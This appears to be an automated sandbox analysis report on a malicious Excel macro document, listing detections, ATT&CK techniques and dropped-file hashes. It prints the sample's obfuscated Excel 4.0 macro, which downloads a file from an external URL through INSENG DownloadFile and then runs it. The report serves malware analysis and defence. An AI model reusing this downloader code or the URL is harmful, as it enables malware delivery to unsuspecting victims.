Analysis Report request_form_1611565093.xlsm
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Compliance: |
---|
Uses new MSVCR Dlls | Show sources |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Source: | File created: | Jump to behavior |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 343657 |
Start date: | 25.01.2021 |
Start time: | 10:17:38 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | request_form_1611565093.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 5 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.evad.winXLSM@1/9@0/0 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 17500 |
Entropy (8bit): | 7.27269933196204 |
Encrypted: | false |
SSDEEP: | 384:SE054yXBP+wrBonCrciUnuiMEcxSAM3H4Dt:STxBP+wrBoKjviMfxDR |
MD5: | 0B0B549418C73651384EE077580EF90A |
SHA1: | 0BE07852D695C0F1077146460C80D12CAC83F4E5 |
SHA-256: | 1E16E04D1FBC61327F71D7A12583E98CE2879A3DC2DAC2E132CC57F130F1C897 |
SHA-512: | CAD54903479ABF6419FD719F735D94FC23C4C81F717DCF52AEC63302F7C0F8E1D317CC9739FA052F3D69438DB9CA0A0694A8596BDD217A5A01D6D1F61A8EC5C6 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.46681782926981 |
Encrypted: | false |
SSDEEP: | 12:85QnLgXg/XAlCPCHaXgzB8IB/H6X+WnicvbzEbDtZ3YilMMEpxRljKT+TdJP9TdU:854/XTwz6IUYewDv3qa+rNru/ |
MD5: | 7CE4093983DDFBAF50630009A8C67F29 |
SHA1: | CE7308163519F07B742ADA51A490CD0046687DFE |
SHA-256: | AE055C4EC644D3C5E55CC0DAB8D78E2361EBD17942B1899FC32B969968F0AE1C |
SHA-512: | 2DD80E1A1D4562B391BB6F8D751D51BB8E7BAB46418BBFC9E72E2CA8DEB15FF42BB980F29623DF96A68AD85A6DA4AD28AF71A6804D3D35C53A0601347B0ABA3B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 124 |
Entropy (8bit): | 4.730125367343892 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWcAOWwUPHWwUmxWcAOWwUv:djYOWwwHWwMOWw2 |
MD5: | D552494C0C27BC8EF619231D5509D459 |
SHA1: | AD96453E66411ECBE725407F4F7F2A2DEED53400 |
SHA-256: | E6FCE0037E4F61265B828FB4243326B80733A6C4DD9EC9AEE3AB053092A4C450 |
SHA-512: | E62CEE522DE779C88A4B40287CD9F3567B067AC6DB1217145F079B6D1ACEA665174641E911EE8CFF86E512342C087D7D04527E4B9EF97AC314A71DF780D7A8BD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2168 |
Entropy (8bit): | 4.510804984760348 |
Encrypted: | false |
SSDEEP: | 24:8I/XTwz6IknYhFRmEec2FDv3qa+dM7dD2I/XTwz6IknYhFRmEec2FDv3qa+dM7dV:8I/XT3IkmmEi0PQh2I/XT3IkmmEi0PQ/ |
MD5: | 85ED2415D98E7D33596129904224E5FE |
SHA1: | DBDFC10D6D7083E6FFAC167CD87C830C79529DED |
SHA-256: | A0E5991EDF024E098349CFC9D0AD0ED812F511491C882EFAC1DAE1643203FCCF |
SHA-512: | 7F3AEEB5B3BF8A6A7E0506C3317D1A66EE977200240F0307163C5AD5DC52BF2C579F24EF6F4201F0A017C27CA05027FB84620847ECA4AE9BE76C5866A135A639 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 17492 |
Entropy (8bit): | 7.2707140624003115 |
Encrypted: | false |
SSDEEP: | 192:SE0uQGI4Ry4tFEBP6pIMVWwPgboTo/6h9RqquS/P2iponE3/UxrpEsN0AMva0xhU:SE054RtIBP+wr8nqtquiMEcxSAM3HBK |
MD5: | B239AE386FC1B8793325FD40C26BD37C |
SHA1: | CEB45CFBB6BD749ACEA058B7BD362723A9A2E8C1 |
SHA-256: | 92F88E52A4EF44D945930EA44B83826CE68CB8C47C78AFBA7B72BA68AE6D18B1 |
SHA-512: | 6B9D3E623B655B98C24680314B7823FB4728221E6F86864DBA2DFCC7A9D19475024D1BD72ABBD9D52C317B93990A8496C064F53E5332310227AD02FD780E589D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 17500 |
Entropy (8bit): | 7.27269933196204 |
Encrypted: | false |
SSDEEP: | 384:SE054yXBP+wrBonCrciUnuiMEcxSAM3H4Dt:STxBP+wrBoKjviMfxDR |
MD5: | 0B0B549418C73651384EE077580EF90A |
SHA1: | 0BE07852D695C0F1077146460C80D12CAC83F4E5 |
SHA-256: | 1E16E04D1FBC61327F71D7A12583E98CE2879A3DC2DAC2E132CC57F130F1C897 |
SHA-512: | CAD54903479ABF6419FD719F735D94FC23C4C81F717DCF52AEC63302F7C0F8E1D317CC9739FA052F3D69438DB9CA0A0694A8596BDD217A5A01D6D1F61A8EC5C6 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.272059464538998 |
TrID: |
|
File name: | request_form_1611565093.xlsm |
File size: | 17535 |
MD5: | 9c47eef4c66e4587ecddb55cfc3ef1e6 |
SHA1: | da444ad39f513282d1918beceadc0ceb6edc0d3d |
SHA256: | 042b7d9208258a1a64b9a1ab0079e1bb7898a3b787167457951b810e9b126dd1 |
SHA512: | 37d43fadd6bb4274c15f5c4c339b00d961f7fdd1590e1a05e24bc4564118cdedc5bdd349b984fba8402b3801b57b440d7a152ac94e573351c2a2fb2d57877099 |
SSDEEP: | 384:rdUK4U2aGcIrbnqtcwiMEO81+dAM3SbTz:ZUVaGcIrbnyviMR81+yj |
File Content Preview: | PK..........!.................[Content_Types].xml ...(.....................!!.................................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "request_form_1611565093.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,=RUN(V2),,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,""JCJ"",'Doc2'!AD15,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,""JCJ"",'Doc2'!AD15&'Doc2'!AD19,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,""JJCCJJ"",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""INSENG"",""DownloadFile"",""BCCJ"",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,""JJCCCCJJ"",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(V1),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://japort.com/suret/victory.php,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
System Behavior |
---|
General |
---|
Start time: | 10:18:45 |
Start date: | 25/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f580000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|